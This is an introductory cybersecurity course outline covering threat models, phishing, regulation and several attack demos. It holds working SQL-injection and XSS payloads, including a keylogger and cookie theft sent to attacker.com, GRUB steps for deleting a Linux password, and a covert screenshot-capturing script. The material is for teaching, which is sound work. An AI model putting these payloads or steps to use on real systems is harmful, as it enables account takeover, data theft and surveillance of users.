Andrés Fernández Muñoz CC BY-NC-SA 4.0
Curso de Introducción a la Ciberseguridad, CREA, ETSIDI-UPM
- 3.1 VULNERABILITIES
- 3.2 MALWARE
- 3.3 WEB SECURITY
- 3.3.1 Vulnerabilities
- 3.3.2 Examples
- 3.4 PC SECURITY
- 3.4.1 Vulnerabilities
- 3.4.2 Password attacks
- 3.4.3 Spyware example
STRIDE Model
| Threat | Impact |
|---|---|
| Spoofing | Authenticity |
| Tampering | Integrity |
| Repudiation | Non-repudiation |
| Information disclosure | Confidentiality |
| Denial of Service | Availability |
| Elevation of privilege | Authorization |
Vulnerability definition: a weakness in a system that can be exploited by a threat actor to perform unauthorized actions within a computer system.
Public vulnerability databases:
Vulnerability scores help prioritize the most relevant ones:
CVSS (Common Vulnerability Scoring System): impact of a vulnerability
EPSS (Exploit Prediction Scoring System): probability that a vulnerability will be exploited
| Type | Definition |
|---|---|
| Phishing | Fraudulent attempt to obtain sensitive information by disguising as a trustworthy entity |
| Spear phishing | Targeted phishing attack to a specific person or organization |
| Whaling | Phishing attack targeting high-profile individuals like executives |
| Vishing | Phishing attack using phone calls or voice messages |
| Smishing | Phishing attack using SMS messages |
| Homograph phishing | Uses characters that look similar to the original ones in a domain name |
Homograph phishing example:
www.bɑnco.com
www.banco.com
VirusTotal - Analyze suspicious files and URLs to detect types of malware
APT = Advanced persistent threat, long-term targeted attack
FW = Firewall
IDS/IPS = Intrusion Detection System / Intrusion Prevention System
EDR = Endpoint Detection and Response
NDR = Network Detection and Response
SIEM = Security Information and Event Management
General Data Protection Regulation (RGPD / GDPR)
- Requires notification of security breaches affecting personal data within 72 hours
- Art. 33 and 34: notification to the authorities and communication to the data subjects
- Fines of up to 20 million euros or 4% of global annual turnover
- Also requires informing users about the use and collection of their personal data
- Once the purpose for using the data has ended, the data must be immediately deleted or anonymized
ENS (Esquema Nacional de Seguridad)
- Requires public bodies and their collaborating entities to manage security incidents properly
Law 43/2010 and Law 8/2011 (Spain)
- Regulate the protection of critical infrastructures and national cybersecurity
Relevant organizations
- INCIBE, CCN-CERT, ENISA, AEPD
Phone number 017 => INCIBE (Instituto Nacional de Ciberseguridad)
URL Structure: protocol://user:password@hostname:port/path?query#fragment
https://foo:bar@example.com:443/path/to/doc.html?p1=v1&p2=v2#top
An SQL injection attack consists of inserting or "injecting" a SQL query via the input data sent from the client to the application. Container demo: http://localhost:8000
-- Insert the attack in the form:
' OR '1'='1
-- PHP query call:
SELECT * FROM users WHERE username = '[]' AND password = '[]';
-- Result query:
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';
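The login query above, as an added example that is not part of the course material: a Python/sqlite3 version of the vulnerable string-built query next to a parameterized query that neutralises the same `' OR '1'='1` payload. The `users` table and its two rows are constructed for this example.

```python
import sqlite3

# The injection string shown in the course demo
PAYLOAD = "' OR '1'='1"


def make_db():
    """Constructed sample users table (not the course's demo container)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def build_query(username, password):
    """Concatenates user input into SQL, exactly like the PHP call on the page."""
    return ("SELECT * FROM users WHERE username = '" + username +
            "' AND password = '" + password + "';")


def login_vulnerable(conn, username, password):
    """Runs the concatenated query: quotes in the input become SQL syntax."""
    return conn.execute(build_query(username, password)).fetchall()


def login_safe(conn, username, password):
    """Parameterized query: the driver sends the values separately from the
    SQL text, so quotes in the input are treated as plain data."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


def demo():
    """Returns the number of rows each login variant matches."""
    conn = make_db()
    # AND binds tighter than OR, so the payload is placed in both fields
    # to make the whole WHERE clause true regardless of stored passwords.
    return {
        "legit_vuln": len(login_vulnerable(conn, "alice", "s3cret")),
        "inject_vuln": len(login_vulnerable(conn, PAYLOAD, PAYLOAD)),
        "legit_safe": len(login_safe(conn, "alice", "s3cret")),
        "inject_safe": len(login_safe(conn, PAYLOAD, PAYLOAD)),
    }


if __name__ == "__main__":
    print(build_query(PAYLOAD, ""))  # reproduces the "Result query" above
    print(demo())
```

With the payload only in the username field, `build_query(PAYLOAD, "")` yields exactly the result query shown above; the injected login returns every user while the parameterized version returns none.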
An XSS attack consists of injecting malicious scripts into other websites. Container demo: http://localhost:8002
<!-- Website corruption: -->
<script>document.body.innerHTML = "<h1>You have been hacked</h1>";</script>
<!-- Keylogger example: -->
<script>
document.onkeypress = function(e) {
fetch("http://attacker.com/log?key=" + e.key);
}
</script>
<!-- Unauthorized access: -->
<script>window.location="http://attacker.com/login"</script>
<!-- Cookies theft: -->
<script>fetch("http://attacker.com/steal?cookie=" + document.cookie)</script>
- Rubber Ducky: USB device that inserts malware into the PC
- Keylogger: Malware that stores the user's keyboard history
- Cain & Abel: Software that can attempt to crack hashed passwords
Delete Linux password:
# 1. Open the GRUB menu (Esc)
# 2. Press "e"
# 3. Add to the kernel line:
# ... handoff "rw init=/bin/bash"
# 4. Press F10
# 5. Delete the password in /etc/shadow
# 6. Restart
Program that continuously stores screenshots:
#!/bin/bash
# Directory where this script lives; screenshots are saved next to it
SCRIPT_DIR="$(dirname "$(realpath "$0")")"
while true; do
    sleep 300                                    # wait 5 minutes between captures
    TIMESTAMP=$(date +"%Y-%m-%dT%H:%M:%S")       # ISO-style timestamp for the file name
    FILENAME="captura_${TIMESTAMP}.png"
    gnome-screenshot -f "$SCRIPT_DIR/$FILENAME"  # capture the whole screen to that file
done